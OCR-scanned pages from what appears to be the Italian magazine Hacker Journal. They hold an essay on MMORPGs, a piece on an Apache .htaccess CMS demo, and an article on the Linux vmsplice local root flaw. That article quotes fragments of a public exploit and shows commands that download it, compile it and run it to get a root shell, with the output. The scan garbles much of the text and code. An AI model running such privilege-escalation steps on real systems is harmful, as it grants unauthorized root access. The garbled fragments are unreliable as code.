(perché questo è) è il fatto che possa- 
no avere un qualcuno che li rappresenti 
in un mondo inesistente, forse qui il di- 
scorso vale più per Second Li- 
fe che per giochi come WoW 
o Lineage, ma comunque 





«T n 




H . f 
Il IMI 



e 

t. 



■H 



vale in generale, anche per l'unico pro- 
gramma per cui milioni di adolescen- 
ti e non, in tutto il mondo, accendono 
il computer ogni giorno: Windows Live 
Messenger. Ma non è di WLM che vo- 
glio parlare in questo articolo. Tornan- 
do al discorso di prima, l'avere un al- 
ter ego in una comunità online, come 
quella di WoW, per molti rappresenta 
un orgoglio. Persone che magari han- 
no avuto problemi nella loro vita terre- 
na e si rifugiano dietro uno schermo, ri- 
scuotendo magari molto successo co- 
me videogiocatori. Per citare un GdR 
che non necessita di molta tecnologia, 
Dungeons&Dragons (da ora D&D) for- 
se è il più famoso e giocato nel mon- 
do. Si compone di due componenti gio- 
canti: un DM Dungeon Master, e i nor- 
mali giocatori.il ruolo del DM è quello 
di inventare la storia o l'avventura che 
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semplicemente nell'af- 
frontare l'ambiente che ti 
circonda cos' com'è, uccidendo mo- 
stri e completando missioni per gua- 
dagnare esperienza e far salire di li- 
vello il tuo personaggio. 



Il Player vs Player, a mio parere è 
l'aspetto dei GdR più emozionante, 
consiste nel far fuori i personaggi che 
giocano nella fazione opposta alla 
tua, o comunque i tuoi avversari. 



O Ecco la postazione standard di un malato di Wow: portatile, connessione e caffè. 



dovranno "vivere" i suoi giocato- 
ri, molte volte anche disegnando 
mappe e illustrazioni varie; il ruolo 
dei "normali giocatori" è fare quel- 
lo che dice il DM =). Come nella 
maggior parte dei giochi di ruolo, 
anche in D&D il giocatore all'inizio 
deve creare il suo personaggio sce- 
gliendo razza (umano, nano, gnomo, 
elfo ecc.) e classe (guerriero, mago, 
stregone, paladino, ladro ecc.), per 
poi farlo di salire di livello secondo le 
avventure pianificate dal DM. 
Non per fare pubblicità, ma se vole- 
te farvi quattro risate vi consiglio cal- 
damente di cercare le voci: "World of 
Warcraft", "Dungeons&Dragons" e 
"Giochi di Ruolo" al sito http://nonci- 
clopedia.wikia.org. 

Adesso passiamo ad un'analisi più ap- 
profondita e, per quanto possibile, ge- 
neralizzata dell'argomento. Prendia- 
mo in considerazione i MMORPG. 
Esistono vari tipi di MMORPG, dai 
più sofisticati ai più semplici, che gi- 
rano su normalissimi browser Web o 
anche su emulatori del vecchio tel- 
net. Al giorno d'oggi sono veramen- 
te pochi i MMORPG che sfruttano an- 
cora questa teconlogia, infatti gli svi- 
luppatori software si sono dedicati 
in modo particolare a perfezionare i 
motori grafici dei videogiochi, fornen- 
do ambientazioni sempre più detta- 
gliate. Esperienza personale: giocan- 
do a WoW con le impostazioni grafi- 
che al massimo, ho visto insetti che 
camminavano sul terreno. 
Generalmente questi giochi sono 
ambientati in un mondo fantastico 



popolato da creature quali elfi, nani, 
goblin e quant'altro; altri invece so- 
no simulatori di vita reale, come Se- 
cond Life o Habbohotel. 
Una cosa positiva (sempre a mio pa- 
rere) di questi giochi, è che creano 
delle pseudo-amicizie, magari anche 
solo virtuali, ma comunque sai che 
quando apri quel maledetto client tro- 
verai sicuramente qualcuno con cui 
giocare assieme e magari farti an- 
che due risate. 

Scendiamo ancora più nel dettaglio, 
in questi giochi esistono vari, dicia- 
mo, "metodi di gioco". Esiste il PvE, 
il PvP, il PK e il RvR. Questi metodi 
di gioco sono generalizzati, poi è ov- 
vio che ogni gioco ha le sue carat- 
teristiche. 



:: Esaminiamoli uno per uno 

PVE O PVM 

Il Player vs Evironment o 
Player vs Monster, è il meto- 
do di gioco più comune, consiste 



Il Player Killer è la tecnica di gioco 
forse più divertente per chi la prati- 
ca, ma sicuramente non è lo stesso 
per chi subisce. Consiste nel dedica- 
re la propria esistenza virtuale a uc- 
cidere altri giocatori, anche al di fuo- 
ri di competizioni. Sono spesso molto 
astuti i giocatori che praticano que- 
sto metodo di gioco. 



j*\j*3^fV 



^^ift;^' ^ 




Realm vs Realm, è un PvP allarga- 
to ai reami (grandi gruppi di giocatori 
generalmente), si vedono scontrarsi 
enormi masse di giocatori per deter- 
minare il reame più forte. ■ 



GLOSSÀRIO «ttORpG 



http://it.wikipedia.org/wiki/Glossario_MMORPG 

Sito ufficiale Europeo WoW: http://www.wow-europe.com 

Sito ufficiale Lineage2: http://www.lineage2.com 

Pagina ufficiale D&D: http://www.wizards.com/dnd 

Per divertirvi: http://nonciclopedia.wikia.org 
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CMS? m, powered 



e affidabile come una guida indiana 



m 



inimale, efficiente, legge- 
ro come una piuma e una 
strabiliante dimostrazione 
della versatilità del più no- 
to ed usato software per servire pa- 
gine web: 



il browser ed ammirare il 
ultato funzionante che do- 
~bbe assomigliare alla ho- 
ì del progetto. 




stema di gestione dei contenuti senza 
installare niente, configurare alcun da- 
tabase, e non scrivere nemmeno una 
riga di codice. 

Chi approda al sito web www.webco- 
dr.com/apache-demo/ può trovare una 
scarna descrizione che spiega come 
l'intero sito sia la dimostrazione del- 
la potenza di Apache. Questa demo di 
Apache (da cui il nome) genera tutto il 
sito attraverso una combinazione di file 
.htaccess, XHTML e fogli di stile CSS. 



:: Come si installa 

Dopo aver scaricato l'archivio (ht- 
tp://www.webcodr.com/apache-de- 
mo/Downloads/demo-1.0.tar) 



con un software che gestisca il formato 
TAR (ad esempio col comando untar da 
shell o terminale) e posizionare il risul- 
tato, gonfiatosi a ben 80KB, nella mot 
del server web. 




*Ht MM lue (Uni Un E» B&ural Imi 



iesce a far interpretare correttamen- 
l'.htaccess da Apache e bisogna con- 
ciare le impostazioni di quest'ultimo, 
aggiungiamo che alcuni servizi di ho- 
sting, soprattutto quelli più economici e 
da battaglia per vari motivi (ad esempio 
economici, ma anche di sicurezza) non 
permettono di usare un proprio .htac- 
cess né tantomeno di mettere mano a 
impostazioni. 



HTÀtìtìESS? 
CHI ERA? 



.htaccess è la contrazione di "hyper- 
text access" ed è un file di configu- 
razione di Apache a livello di di- 
rectory, solitamente nascosto gra- 
zie al punto all'inizio del nome (se- 
condo una convenzione UNIX). Un 
.htaccess è un banale file di testo che 
però fornisce direttive ad Apache su 
come deve elaborare le richieste dei 
client e presentare il contenuto (ma 
anche permettere o meno la visua- 
lizzazione o mostrare l'indirizzo) del- 
la directory in cui si trova e nelle sot- 
todirectory. 

La guida ufficiale di Apache a .htac- 
cess è consultabile (in inglese) all'uri: 
http://httpd.apache.Org/docs/2.2/ 
howto/htaccess.html 



A questo punto possiamo subito lancia- Chi infine è riuscito a far funzionare il tutto 



[ p 28 )_[ www.hackerjournal.it ] 



e vuole personalizzare 
ulteriormente il cms non 
a che da aprire e modifi- 
care il .htaccess. AN'indiriz- 
o http://www.webcodr.com/ 
apache-demo/Documentation/ 
lnstallation.html 
c'è la spiegazione commentata del 
file fornito, di cui si può approfittare 
,er assemblare il setup che meglio ci 
soddisfa, dal messaggio di errore per i 
file non trovati alle icone da visualizza- 
re nell'elenco dei file, delle directory e 
della navigazione. 



:: Usiamolo 



Quando si "spacchetta" il file sca- 
ricato ci ritroviamo i seguenti file e 
folder 



.he ci si presentano di base sono: 

Documentation 

Downloads 

etc 

footer.html 

header.html 

plain text document.txt 

README 



iLntutKitmtmin[s»sum«ismitji 



Di cui però nel browser vediamo solo 

Documentation 

Downloads 

etc 

plain text document.txt 

Per aggiungere file o creare nuove di- 
rectory visibili (e consultabili) via brow- 
ser basta aggiungere gli oggetti npi 
filesystem (o fare un upload via ft~ 
Vanno bene documenti .txt, .h 
mi, .jpg, .gif .png e così via: se i 
tratta di contenuto che il browse 
(da solo o con plugin) può gestir 
e visualizzare (audio, video) ne 
c'è problema nemmeno per Api 
che Demo. 
Sono però invisibili i file senza estensio 
(come il README) e due particolari 
aumenti HTML chiamati header.html 
e footer.html perché nel file .htaccess ci 
sono delle direttive specifiche in merito 
come la seguente 

Indexlgnore header.html footer.html 



:: L'aspetto 



Si può intervenire in maniera rapida 
ed efficace sul testo di presentazio- 
ne di ogni directory proprio andando 



Index of /-rida 



^ T 6^ T j? *JL ©http://127.0.0.1/~nda/ 



▼ l> |G] T Google 



a : (wh 



Benvenuti alla dimostrazione di Apache 

Questo sito web è generato esclusivamente grazie ad una 
combinazione di .htaccess., CSS., XHTML, e di navigazione nel file 
system in locale. E stato realizzato per verificare la fattibilità di un 
CMS (content management system) interamente basato su Apache, 

Il progetto è open source e lo potete usare come meglio credete. Se 
lo ritenete giusto citateci nei ringraziamenti. E divertitevi :) 



Marne Last modified Siz- 

^ Parent Directory 26-Jan-2008 14:34 - 
Mj Appunti.txt 19-Feb-2008 03:15 lk 

Q Documentation/ 16-Apr-2007 11:53 

Q Downloads/ Ol-Feb-2008 16:21 

Qetc/ 16-Apr-2007 11:53 

BÌ footer.html 16-Apr-2007 10:01 lk 

fi] header.html 19-Feb-2008 03:21 lk 

Qold/ Ol-Feb-2008 16:21 

Apache/1,3,33 Server ar 127,0,0,1 Por: SO 



a modificare i due file HTML. 



gere o personalizzare il testo 
compare in cima e se vogliamo 
che aggiungere della grafica o 
tro codice. 



isso vale 
oter.htm 



Ogni direc 

ha la sua br 

coppia di h 

der.html e foc 

html e anche se 

parere una inutile x\\ 

zione, questo permette di person; 

zare il sito illustrando i contenuti 

si trovano nelle varie sottocartell 




Nicola D'Agostino 



FIN N|) WNMI 
ÌETTAGU 



pache demo è stato realizzato da 
un gruppo di sviluppatori che si 
firma Webcodr. Sul loro sito o me- 
glio blog si trova anche una spiega- 
zione pratica (www.webcodr.com/34/ 
build-a-lightweight-cms-using-htac- 
cess/) piuttosto dettagliata passo 
passo della creazione e del funziona- 
mento dello strumento e dei file di cui 
è composto. 
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LINUX 






M generale ma anche rapida 
soluzione eoo ona paten apposita 
per on exploit del più famoso 
sistema operativo free al mondo 



:: COSa ?? 



Si, è stato trovato un bug abbastan- 
za facile da sfruttare nel kernel Li- 
nux. 

Per chi non ricorda, il kernel è la base di 
tutti i sistemi operativi, la parte a contat- 
to diretto con la ferraglia per intender- 
ci. E Linux è la base di tutti i sistemi ba- 
sati, appunto, su Linux. Quindi (giusto 
per citare i più famosi) : Debian GNU/ 
Linux, RedHat Linux, Fedora, Gentoo, 
Arch, Slackware e via dicendo. 



:: Che fa? 



Il bug permette ad un utente norma- 
le (senza privilegi particolari) che 
compila ed esegue (o esegue sola- 
mente) un programma appositamen- 
te scritto utilizzando il linguaggio C, 
di poter eseguire codice con i mas- 
simi privilegi. Ad esempio, potrebbe 
aprire una shell di root, e fare un po' 
qualsiasi cosa. 

Questo è un problema molto molto 
grosso, dato che un utente normale 
può così avere accesso in modo esclu- 
sivo alle impostazioni, alle risorse ed a 



tante altre cose, senza 
averne l'autorizzazione. 
Sono affetti da questo 
problema tutti i kernel 
in cui è stata introdotta 
questa chiamata di siste- 
ma, ovvero i kernel dal ramo 
2.6.17.X (incluso) al 2.6.24. 
Leggendo in changelog del ker- 
nel Linux (http://www.kernel. 
org), pare che tutto sia stato 
risolto con l'ultima versione del 
kernel, la 2.6.24.2 . 

Mentre scriviamo (probabilmente mol- 
to prima di quando voi leggerete que- 
ste parole), non ci risulta che tutte le di- 
stro abbiano già aggiornato il loro ker- 
nel: al momento, i mantainer di Debian 
4.0 (alias "Etch") non hanno ancora ag- 
giornato il kernel ad una versione supe- 
riore alla 2.6.18 (quella di default). Tra- 
lasciando le distro più "hardcore" tipo 
Slackware e Gentoo (per i cui utenti ti- 
po il kernel della release in uso ha po- 
ca importanza, ed è un'operazione ab- 
bastanza comune la compilazione dello 
stesso), si può dire che non tutte le di- 
stro al momento hanno aggiornato i loro 
kernel. Sicuramente avranno aggiorna- 
to quando leggerete questo articolo. 







j 



:: Come funziona? 

Passiamo adesso a vedere su co- 
sa si basa questo exploit, e diamo 
un'occhiata al codice pubblicato su 
MilwOrm (http://www.milwOrm.com/ 
exploits/5092), un proof of concept 
che ci permette di toccare con mano 
la pesantezza di questo problema. 
Per poter sfruttare questo exploit, biso- 
gna smanettare un po' con le system 
calls di Linux. 

Nello specifico, l'exploit sfrutta il fatto 
che la chiamata si sistema vmsplice_ 
to_user(), che non convalida la prove- 
nienza dei puntatori passati come ar- 
gomento, e copia il contenuto di questi 
puntatori dall'area di memoria iniziale 
(che potrebbe anche essere memoria 
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di un processo in user-space) in un'area 
di memoria in kernel-space, eseguendo 
poi gli altri comandi impartiti nel sorgen- 
te con i privilegi di root, e senza control- 
lare mai l'effettiva leggittimità a livello di 
permessi di tali comandi. 
In parole semplici, la funzione non con- 
trolla mai che se chi gli ha passato le 
istruzioni che sta eseguendo abbia i 
permessi per farlo. 



Diamo un'occhiata e commentiamo un 

po' il codice : 

Omettiamo qualche linea per problemi 

di spazio, ma chi volesse approfondire 

può tranquillamente andare a leggere 

il sorgentino linkato in precedenza ( ht- 

tp://www.milw0rm.com/exploits/5092 , 

per gli smemorati). 

Tralasciando un po' la prima linea di 

commento, troviamo una brevissima 



descrizione dell'exploit, poi tutti gli in- 
clude necessari (librerie varie, tra cui 
figurano sys/uio.h, sys/mman.h e asm/ 
unistd.h) e qualche #define.Osservan- 
do il codice possiamo vedere i due pun- 
ti cruciali dell'exploit: la chiamata della 
funzione _vmsplice(), che non esiste 
come funzione in se, ma è definita poco 
prima nel sorgente come un alias a sy- 
scallO, infatti nel codice troviamo: 



#define _ vmsplice (fd,io,nr,f 1) syscalK 



vmsplice, 



t sua chiamata: 

_vmsplice(pi[1], &iov, 1, 

o); 

Dove pi[] è un'array di- 



contente una struttura ed 1 e sono 
altri valori ausiliari. 
Nel sorgente si effettua anche il con- 
trollo se l'architettura del processore 
è x86 a 32 bit o x86 a 64 bit. Se non 



chiarato in precendenza, è nessuna delle due, il codice lan- 
&iov è l'area di memoria eia un errore di architettura non sup- 



portata. 

Pare quindi che le altre architetture 
(chi ha detto PowerPC ?) siano al si- 
curo da questo problema. 

Proviamo adesso a compilare ed 
eseguire il codice: 



belthazor® szahyon 
belthazor® szahyon 
belthazor® szahyon 



~ $ curi http://www.milw0rm.com/exploits/5092 
~ $ gec exploit. e -o rootShell 
~ $ .rootShell 



html2text > exploit. e 



Linux vmsplice Locai Root Exploit 
By qaaz 

[+] mmap: 0x0 .. 0x1000 

page : 0x0 

page: 0x20 

mmap: 0x4000 .. 0x5000 

page: 0x4000 

page: 0x4020 

mmap: 0x1000 .. 0x2000 

page: 0x1000 



[+ 
[+ 
[+ 
[+ 
[+ 
[+ 

[+: 



mmap: 0xb7elf000 .. 0xb7e51000 
j root/rootShell 
root® szahyon : /home/belthazor # 



Strabiliante. Abbiamo una shell di 
root. 



è una problematica pesante, ma co- 
munque già risolta. 



:: Conclusioni 



Tutti i sistemi operativi hanno 
problemi. 

La cosa giusta da fare quando si 
trova un problema in qualche ap- 
plicazione, è segnalarlo agli svi- 
luppatori. 
Quella trattata in questo articolo 



Non rendiamoci lamer, se troviamo 

una macchina con Linux affetta da 

questo problema, avvisiamo l'am- 

[ ministratore, e non facciamo la- 

1 merate. 



_\ Ed aggiorniamo le nostre macchi- 



^^ ne :-P 



Lord Belthazor Fenov 
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~ hi se non dei giapponesi potevano pensare di stende- 

Nessun'altro e così si sono 
messi di buona lena a disegnare questa mappa dove al cen- 
tro si trova l'utente e le varie linee rappresentano le tipolo- 



gie di siti. Le stazioni segnalate più in grande rappresenta- 
no quelle più trafficate e quindi più importanti mentre le in- 
tersecazioni tra le varie linee rappresentano quei siti che si 
propongo a cavallo tra vari interessi. Bel lavoro. 
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